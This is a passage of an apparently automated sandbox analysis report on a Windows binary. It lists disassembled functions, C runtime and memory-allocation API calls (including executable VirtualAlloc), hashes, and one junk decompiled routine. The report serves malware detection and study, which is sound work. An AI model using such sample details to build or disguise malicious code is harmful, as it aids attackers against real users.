Instruction Fuzzy Hash: B0A17CB1A003089BDB24DF44D885BAA77F1FB88314F20816AE6157B3D1D379AD51CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413710 Relevance: 6.3, APIs: 4, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041379B

Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC4E
Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC57

__nh_malloc_dbg.LIBCMTD ref: 004138C7

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __errno__nh_malloc_dbg
String ID:
API String ID: 3832883334-0
Opcode ID: 793defc74cc45d5d8457490f5a72f75f574c83ee9fcdd8e837b8dc5dae5b7d4a
Instruction ID: 061f960c3c56bc4dce60459519cbd0593be2b9e81a6d0b496bea9f962261da1e
Opcode Fuzzy Hash: 793defc74cc45d5d8457490f5a72f75f574c83ee9fcdd8e837b8dc5dae5b7d4a
Instruction Fuzzy Hash: A2E13874E04248CFDB24CFA8C884BADBBB1BF49315F24825ED4656B392C734A986CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB4E Relevance: 4.6, APIs: 3, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__errno.LIBCMTD ref: 0040AB8C
__invalid_parameter.LIBCMTD ref: 0040ABAD
_memset.LIBCMT ref: 0040ABF9

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __errno__invalid_parameter_memset
String ID:
API String ID: 2676528542-0
Opcode ID: 37f8fe0bcb31b3883c75da82c39e24722da4a38c9a7c88ba761914a44d406125
Instruction ID: 2d848b4623ee339f532b0a9df94e392e645202c2593e86f426ce9e794cc7a4fd
Opcode Fuzzy Hash: 37f8fe0bcb31b3883c75da82c39e24722da4a38c9a7c88ba761914a44d406125
Instruction Fuzzy Hash: 2C1186B1A40204BBDB04DF99CC42F9F7375AB54714F10C56AFA08BB2D1E778EA508759

Uniqueness

Uniqueness Score: -1.00%

Function 0040A73F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

QQ, xrefs: 0040A739

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID:
String ID: QQ
API String ID: 0-3460843698
Opcode ID: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
Instruction ID: b8a05fa9faf6205259e42587776440811784b13b78a99f35adb91e39540faf13
Opcode Fuzzy Hash: 75285a33f3e3a8226227495b54544be31729fa98091c7b21b9d872baf7ad745d
Instruction Fuzzy Hash: 4C011DB5A00209EBDB04DF68D940B9B73B4AB48304F10C16AFC059B280D33CDA62DB97

Uniqueness

Uniqueness Score: -1.00%

Function 00424F84 Relevance: 1.7, APIs: 1, Instructions: 204
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(0043C908,?,00425859,?,?,?,?,0040A315), ref: 00425145

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1c8093f970db0c7b47a6f918467a1ea0a2059fc68439062a2676e089865b2bd9
Instruction ID: d5c22196e6c86787fc6187b0217c9cf31e173426e2d09062d4b128ef03e1c2a9
Opcode Fuzzy Hash: 1c8093f970db0c7b47a6f918467a1ea0a2059fc68439062a2676e089865b2bd9
Instruction Fuzzy Hash: D5710FB690025CFFD7019BA4ED88EAE7B7CFB08349F04546AF242B2161D7795E448B39

Uniqueness

Uniqueness Score: -1.00%

Function 00413784 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041379B

Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC4E
Part of subcall function 0040AC10: __errno.LIBCMTD ref: 0040AC57

__nh_malloc_dbg.LIBCMTD ref: 004138C7

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __errno__nh_malloc_dbg
String ID:
API String ID: 3832883334-0
Opcode ID: 34d6c818ea2fe7f6eb22eff2ff5ec1cc226b4d9611d433e3dacdf37c4d1b4bc2
Instruction ID: 1f670b468b00d4af42eef1d2518bac94037d84d9ccaa06d3adbf7d70b26c640e
Opcode Fuzzy Hash: 34d6c818ea2fe7f6eb22eff2ff5ec1cc226b4d9611d433e3dacdf37c4d1b4bc2
Instruction Fuzzy Hash: B4E020F1F883049AE7309E65580B758B320E740735F20876FD235371C2D77904404F09

Uniqueness

Uniqueness Score: -1.00%

Function 00411230 Relevance: 1.5, APIs: 1, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__encode_pointer.LIBCMTD ref: 00411237

Part of subcall function 00411160: __crt_wait_module_handle.LIBCMTD ref: 004111AC
Part of subcall function 00411160: RtlEncodePointer.NTDLL(?), ref: 004111E7

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: EncodePointer__crt_wait_module_handle__encode_pointer
String ID:
API String ID: 2010845264-0
Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction ID: 09228d863bb85d535e186be7d3ba10737ef20bba413071e9007e4ba5bde40c4c
Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction Fuzzy Hash: 8DA0127244420C33D00021833803B03750C43C0678F080021F70D051422883A8508097

Uniqueness

Uniqueness Score: -1.00%

Function 0040A190 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMTD ref: 0040A195

Part of subcall function 0040A1B0: _check_managed_app.LIBCMTD ref: 0040A22C
Part of subcall function 0040A1B0: __heap_init.LIBCMTD ref: 0040A236
Part of subcall function 0040A1B0: _fast_error_exit.LIBCMTD ref: 0040A244
Part of subcall function 0040A1B0: __mtinit.LIBCMTD ref: 0040A24C
Part of subcall function 0040A1B0: _fast_error_exit.LIBCMTD ref: 0040A257
Part of subcall function 0040A1B0: __RTC_Initialize.LIBCMTD ref: 0040A269
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A280
Part of subcall function 0040A1B0: ___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A292
Part of subcall function 0040A1B0: ___wsetargv.LIBCMTD ref: 0040A29C
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A2A7
Part of subcall function 0040A1B0: __wsetenvp.LIBCMTD ref: 0040A2AF
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A2BA
Part of subcall function 0040A1B0: __cinit.LIBCMTD ref: 0040A2C4
Part of subcall function 0040A1B0: __amsg_exit.LIBCMTD ref: 0040A2D9
Part of subcall function 0040A1B0: __wwincmdln.LIBCMTD ref: 0040A2E1

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$EnvironmentInitializeStrings___crt___security_init_cookie___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 1121526160-0
Opcode ID: 98989cdd7d29ee53ab50e6002a0618e3ff689f374e6eb608bae79b142b6f8e86
Instruction ID: c299c375e01da09e6c6c5d30e23f0e2f60812c71b290b268a86586838b04dc32
Opcode Fuzzy Hash: 98989cdd7d29ee53ab50e6002a0618e3ff689f374e6eb608bae79b142b6f8e86
Instruction Fuzzy Hash: BAA0223200830C02000033EB200380B3A0E08C032CF88002BBA0C0A2030C2CBCA000AF

Uniqueness

Uniqueness Score: -1.00%

Function 007861B6 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00786207

Memory Dump Source

Source File: 00000000.00000002.335529024.0000000000781000.00000040.00000020.00020000.00000000.sdmp, Offset: 00781000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_781000_hOdgEiePTe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 81028aa27df689a88f5f69843596f682197a665b8659607f76335c1622489b03
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 8F113C79A40208FFDB01DF98CA85E98BBF5AF08350F058095F9489B362D375EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00424713 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,004255FE,?,?,?,?,0040A315,00400000), ref: 0042471B

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 14d80848cfb73261ec2c603f215e5016d321cdbd42351cf64f18514759d56cad
Instruction ID: e1373a8cda5d02e5e31bd4588887f7f1e2c4502a10a285b5590f57bb0ca19892
Opcode Fuzzy Hash: 14d80848cfb73261ec2c603f215e5016d321cdbd42351cf64f18514759d56cad
Instruction Fuzzy Hash: D1B0127D0061C1CBE7000FA0ED047003B70A308302F004431E508415F4D77100409F1D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004014DF Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

PPPP, xrefs: 004015E9

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID:
String ID: PPPP
API String ID: 0-1462104750
Opcode ID: c9c0241cd0afcbd3fd31c594775fe31887d42f61bb82ab006a020ba5247fe7de
Instruction ID: 42034d581ce3fc54d6be9e219e9e8320d81d709d73c932a33cf25b948e6a08f8
Opcode Fuzzy Hash: c9c0241cd0afcbd3fd31c594775fe31887d42f61bb82ab006a020ba5247fe7de
Instruction Fuzzy Hash: 38418EF2019A827FE3124F20DC5ACFB7B7DD94921130886CAF894DB952C6595895C7F3

Uniqueness

Uniqueness Score: -1.00%

Function 00785DD4 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

f]x, xrefs: 00785DDA

Memory Dump Source

Source File: 00000000.00000002.335529024.0000000000781000.00000040.00000020.00020000.00000000.sdmp, Offset: 00781000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_781000_hOdgEiePTe.jbxd

Similarity

API ID:
String ID: f]x
API String ID: 0-3805328535
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: de4299611fb231cb1ae093ef8f8e4f0624e3197ee41952fcd2a23b4bbff60e4a
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: AE117C72380500AFDB44EF59DCC1FA673EAEB88720B298065ED04CB316D679ED02C760

Uniqueness

Uniqueness Score: -1.00%

Function 00402351 Relevance: .1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00402351(void* __eax, intOrPtr* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t36;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed char _t47;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed char _t54;
				void* _t70;
				void* _t72;
				void* _t77;
				void* _t79;
				void* _t81;
				void* _t82;

				_t79 = __esi;
				_t70 = __edx;
				_pop(_t84);
				asm("fst qword [0x9c2ddd94]");
				_t72 = __eax + 0x3af0294;
				_push(_t72);
				_t36 = __edi - 1;
				_push(_t36);
				_push(_t36);
				_t37 = _t72;
				ss = _t36;
				_push(_t37);
				_push(_t37);
				asm("fst dword [edi]");
				_t38 = _t37;
				_t39 = _t36;
				ss = _t37;
				asm("adc [eax+0x50], dl");
				ss = _t39;
				_t41 = _t38 + 1;
				_push(_t41);
				_push(_t41);
				_push(_t41);
				_t42 = _t39;
				ss = _t41;
				_push(_t42);
				_push(_t42);
				_push(_t42);
				es = _t42;
				_t43 = _t42 + 0xc3af02b4;
				asm("fcom qword [eax+0x50]");
				asm("aad 0x90");
				_t77 = _t43;
				asm("aad 0x96");
				_push(_t43);
				_push(_t43);
				_push(_t43);
				_push(__edx);
				asm("scasd");
				_t44 = _t43 & 0xc0c3afb4;
				_push(_t44);
				_push(_t44);
				_push(_t44);
				 *0xd45f50bc =  *0xd45f50bc >> __ecx;
				asm("repe push eax");
				_push(_t44);
				_push(_t44);
				asm("scasd");
				_t45 = _t44 & 0xaf103abc;
				_t82 = _t81 +  *((intOrPtr*)(_t45 - 0x27));
				asm("adc eax, 0xbc05dda4");
				asm("movsb");
				_t46 = _t45 & 0xc0c3afb4;
				_push(_t46);
				_push(_t46);
				_push(_t46);
				asm("aad 0x90");
				_t47 = _t46 & 0xbc2dd329;
				_push(_t47);
				asm("fist dword [0x4410dba4]");
				asm("fst dword [0x6baf61a8]");
				_t50 = (_t47 & 0x00000023) - 0xdd3323a8 + 0x503a02bc;
				es = _t50;
				asm("scasd");
				_t51 = _t50 & 0xc4c3afb4;
				_push(_t51);
				_push(_t51);
				_push(_t51);
				 *0x162450bc =  *0x162450bc >> __ecx +  *((intOrPtr*)(_t77 + 0x25afbc25));
				asm("rcl dword [0x25af52bc], cl");
				_push(0xdda015d9);
				_t52 = _t51 + 0x25af02bc;
				es = _t52;
				asm("scasd");
				_t53 = _t52 & 0xc4c3afb4;
				_push(_t53);
				_push(_t53);
				_push(_t53);
				asm("aad 0x90");
				_t54 = _t53 & 0xbc2dd347;
				asm("fist dword [0x4010dda0]");
				 *__ebx =  *__ebx + (_t54 & 0x00000041);
				asm("aad 0x90");
				asm("scasd");
				ss = _t54;
				goto L1;
			}

0x00402351
0x00402351
0x00402356
0x00402357
0x0040235d
0x0040235e
0x0040235f
0x00402360
0x00402361
0x00402363
0x00402364
0x00402366
0x00402367
0x0040236a
0x0040236c
0x0040236d
0x0040236e
0x00402370
0x00402375
0x00402376
0x00402377
0x00402378
0x00402379
0x0040237b
0x0040237c
0x0040237e
0x0040237f
0x00402380
0x00402382
0x00402386
0x0040238b
0x0040238f
0x00402391
0x00402392
0x00402394
0x00402395
0x00402396
0x004023a0
0x004023a1
0x004023a2
0x004023a7
0x004023a8
0x004023a9
0x004023aa
0x004023b0
0x004023b2
0x004023b3
0x004023b4
0x004023b5
0x004023ba
0x004023bd
0x004023c8
0x004023cc
0x004023d1
0x004023d2
0x004023d3
0x004023d4
0x004023d6
0x004023db
0x004023de
0x004023e4
0x004023ef
0x004023f8
0x004023f9
0x004023fa
0x004023ff
0x00402400
0x00402401
0x00402402
0x00402408
0x00402413
0x00402418
0x00402423
0x00402424
0x00402425
0x0040242a
0x0040242b
0x0040242c
0x0040242d
0x0040242f
0x00402437
0x0040243d
0x00402444
0x00402448
0x0040244e
0x0040244f

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb95eb28c3ea5ceec2e3033c146810c6e2f5aab3d7c853bbb481ccd21ba1313a
Instruction ID: c5558df752f303d9b12da3b49636c5f29c6388f54a3b64fc1eef45c3947951cf
Opcode Fuzzy Hash: cb95eb28c3ea5ceec2e3033c146810c6e2f5aab3d7c853bbb481ccd21ba1313a
Instruction Fuzzy Hash: 63417AF311AA857FF3118A94EC4ADFB7B2CD5681393084485FD40DB403C268C8A18BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00402072 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13551ef71cb1a6f447fbd5480a6cb103b1654af51dbb33939e4de5ef2e619886
Instruction ID: 1d2253bcee00caf847626527a2ca008675ce4aadaffea8765609509fba5c1da7
Opcode Fuzzy Hash: 13551ef71cb1a6f447fbd5480a6cb103b1654af51dbb33939e4de5ef2e619886
Instruction Fuzzy Hash: 80D022B2864CA0AFEB006210CC1896B7FAC8C15210708C080B801E9119C30810218BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00401EFD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4fbf70458648bca6f8a21e4b213d349669eb636f4c34a3048d8fef98564362
Instruction ID: 19ab161c9d805c9666a3c863c0cbb36cd8fc6fea7ed9fd7909dadc4bd56c9e04
Opcode Fuzzy Hash: 2c4fbf70458648bca6f8a21e4b213d349669eb636f4c34a3048d8fef98564362
Instruction Fuzzy Hash: 48D022B2804CA4AFEB006600CC149AB7FAD8C14310B08C040B801E5119C3091026CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00419D3E Relevance: 58.2, APIs: 32, Strings: 1, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 00419D82
_wcscat_s.LIBCMTD ref: 00419F9A

Part of subcall function 00417FB0: __errno.LIBCMTD ref: 00418004
Part of subcall function 00417FB0: __invalid_parameter.LIBCMTD ref: 00418022

__invoke_watson_if_error.LIBCMTD ref: 00419FA3

Part of subcall function 0040D750: __invoke_watson.LIBCMTD ref: 0040D771

_wcscat_s.LIBCMTD ref: 00419FD2

Part of subcall function 00417FB0: _memset.LIBCMT ref: 0041808B
Part of subcall function 00417FB0: __errno.LIBCMTD ref: 004180C9
Part of subcall function 00417FB0: __invalid_parameter.LIBCMTD ref: 004180E7

__invoke_watson_if_error.LIBCMTD ref: 00419FDB
__errno.LIBCMTD ref: 00419FF7
__errno.LIBCMTD ref: 0041A004
__errno.LIBCMTD ref: 0041A065
__invoke_watson_if_oneof.LIBCMTD ref: 0041A06D
__errno.LIBCMTD ref: 0041A075
_wcscpy_s.LIBCMTD ref: 0041A0B2
__invoke_watson_if_error.LIBCMTD ref: 0041A0BB
__invoke_watson_if_oneof.LIBCMTD ref: 0041A15E
_wcscpy_s.LIBCMTD ref: 0041A196
__invoke_watson_if_error.LIBCMTD ref: 0041A19F
__itow_s.LIBCMTD ref: 00419D79

Part of subcall function 00420610: _xtow_s@20.LIBCMTD ref: 0042063B

__errno.LIBCMTD ref: 00419E08
__errno.LIBCMTD ref: 00419E15
__strftime_l.LIBCMTD ref: 00419E39
__errno.LIBCMTD ref: 00419E6A
__invoke_watson_if_oneof.LIBCMTD ref: 00419E72
__errno.LIBCMTD ref: 00419E7A
_wcscpy_s.LIBCMTD ref: 00419EB7
__invoke_watson_if_error.LIBCMTD ref: 00419EC0
_wcscpy_s.LIBCMTD ref: 00419F13
__invoke_watson_if_error.LIBCMTD ref: 00419F1C
_wcscat_s.LIBCMTD ref: 00419F4D
__invoke_watson_if_error.LIBCMTD ref: 00419F56

Strings

hhS@, xrefs: 00419F2B

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __errno$__invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$__invoke_watson__itow_s__strftime_l_memset_xtow_s@20
String ID: hhS@
API String ID: 3381563063-2119751023
Opcode ID: 80b1f1f9ef0165c2a03c8708ec8e409da3a59c342dca85cfa7940f235414c6d9
Instruction ID: d27af07320d1eb642590504ffb9d02af422ede3df7889ce0abf490f02814720b
Opcode Fuzzy Hash: 80b1f1f9ef0165c2a03c8708ec8e409da3a59c342dca85cfa7940f235414c6d9
Instruction Fuzzy Hash: D402D2B1A40714ABDB20EF50CC4ABDF7374AB44706F1080AAF608762C1D7B99AD4CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1A8 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 221COMMON

Download Yara Rule

APIs

_wcscpy_s.LIBCMTD ref: 0040F1CF

Part of subcall function 0041B1C0: __errno.LIBCMTD ref: 0041B214
Part of subcall function 0041B1C0: __invalid_parameter.LIBCMTD ref: 0041B232

__invoke_watson_if_error.LIBCMTD ref: 0040F1D8
_wcslen.LIBCMTD ref: 0040F1ED
_wcslen.LIBCMTD ref: 0040F1FE
_memcpy_s.LIBCMTD ref: 0040F249
__invoke_watson_if_error.LIBCMTD ref: 0040F252

Part of subcall function 0040D750: __invoke_watson.LIBCMTD ref: 0040D771

_wcslen.LIBCMTD ref: 0040F264
_wcslen.LIBCMTD ref: 0040F275
__errno.LIBCMTD ref: 0040F287
__errno.LIBCMTD ref: 0040F294

Strings

h9@, xrefs: 0040F42F, 0040F435
T9@, xrefs: 0040F3E8
x9@, xrefs: 0040F421, 0040F427
hp7@, xrefs: 0040F4FB
}*j, xrefs: 0040F47F
}8j, xrefs: 0040F4BC

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _wcslen$__errno$__invoke_watson_if_error$__invalid_parameter__invoke_watson_memcpy_s_wcscpy_s
String ID: T9@$h9@$hp7@$x9@$}*j$}8j
API String ID: 1901159194-2627948063
Opcode ID: 69e32b321e248410000e7823130aea819443181b8e358e7ce34e22efff76e140
Instruction ID: c989a44e0b005258df185deb6b351e4735925c0c1cc0b0e9ba5036a14e9ba7d7
Opcode Fuzzy Hash: 69e32b321e248410000e7823130aea819443181b8e358e7ce34e22efff76e140
Instruction Fuzzy Hash: 9D918FB1A00218FBDB24EF94CC49BAE7774AB48305F1081BAA905762C1D3799AD9CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1F9 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
_get_int64_arg.LIBCMTD ref: 0041C2B0
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477
_write_multi_char.LIBCMTD ref: 0041C57E
_write_multi_char.LIBCMTD ref: 0041C5C5
_wctomb_s.LIBCMTD ref: 0041C642

Strings

-, xrefs: 0041C51E
9, xrefs: 0041C488

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s
String ID: -$9
API String ID: 2113545778-1631151375
Opcode ID: 2d1ca70876759fbd93998b0827d82937963de4f2786de7028e337a2b57bedfd8
Instruction ID: cd65fcbc2bc2221da77d8da28465a990ab50a61e976fa800fbad99ea58a0f3b0
Opcode Fuzzy Hash: 2d1ca70876759fbd93998b0827d82937963de4f2786de7028e337a2b57bedfd8
Instruction Fuzzy Hash: AFF147B1D05229DFDB24CF58CC99BEEB7B5BB44304F14819AE419AB281D7389E80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004233FB Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
_get_int64_arg.LIBCMTD ref: 004234B8
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682
_write_multi_char.LIBCMTD ref: 0042379B
_write_string.LIBCMTD ref: 004237B6
_write_multi_char.LIBCMTD ref: 004237E2
__mbtowc_l.LIBCMTD ref: 00423851

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
API String ID: 3455034128-2366072709
Opcode ID: 0da551da4dec862d04427afc1448beefefa974af13e610212c996657d24ce15e
Instruction ID: 62ad9c785d221e5c00ffa65a97d7f62d947cc529f609b8795f9a55a19a6e0c30
Opcode Fuzzy Hash: 0da551da4dec862d04427afc1448beefefa974af13e610212c996657d24ce15e
Instruction Fuzzy Hash: 14F15BB1E002299FDB24CF54DC81BAEB7B5BF85305F5041AAE109AB241D738AE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF57 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0041BF5B
__get_printf_count_output.LIBCMTD ref: 0041BF69
__errno.LIBCMTD ref: 0041BFCF
__invalid_parameter.LIBCMTD ref: 0041BFF0
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0041C005
_write_multi_char.LIBCMTD ref: 0041C57E
_write_multi_char.LIBCMTD ref: 0041C5C5
_wctomb_s.LIBCMTD ref: 0041C642

Strings

-, xrefs: 0041C51E

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s
String ID: -
API String ID: 3485403616-2547889144
Opcode ID: c4689f47102e2fffd20a84aebc8cb3fc6401d55190ec87416caf6d3719635920
Instruction ID: 20aea1e434da3f91db583703a55d6725de54bea7f50346c70a74c09eb3d77303
Opcode Fuzzy Hash: c4689f47102e2fffd20a84aebc8cb3fc6401d55190ec87416caf6d3719635920
Instruction Fuzzy Hash: 53A18AB1D412299BDB24DF54CC89BEEB7B5EB48304F1081EAE0197A281D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3A5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 105windowCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMTD ref: 0040F470

Part of subcall function 0041AFD0: __vsnwprintf_s_l.LIBCMTD ref: 0041AFF2

__errno.LIBCMTD ref: 0040F49B
__invoke_watson_if_oneof.LIBCMTD ref: 0040F4A3
__errno.LIBCMTD ref: 0040F4AB
_wcscpy_s.LIBCMTD ref: 0040F4E5
__invoke_watson_if_error.LIBCMTD ref: 0040F4EE
___crtMessageBoxW.LIBCMTD ref: 0040F507

Strings

h9@, xrefs: 0040F42F, 0040F435
T9@, xrefs: 0040F3E8
x9@, xrefs: 0040F421, 0040F427
hp7@, xrefs: 0040F4FB
}*j, xrefs: 0040F47F
}8j, xrefs: 0040F4BC

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s__vsnwprintf_s_l_wcscpy_s
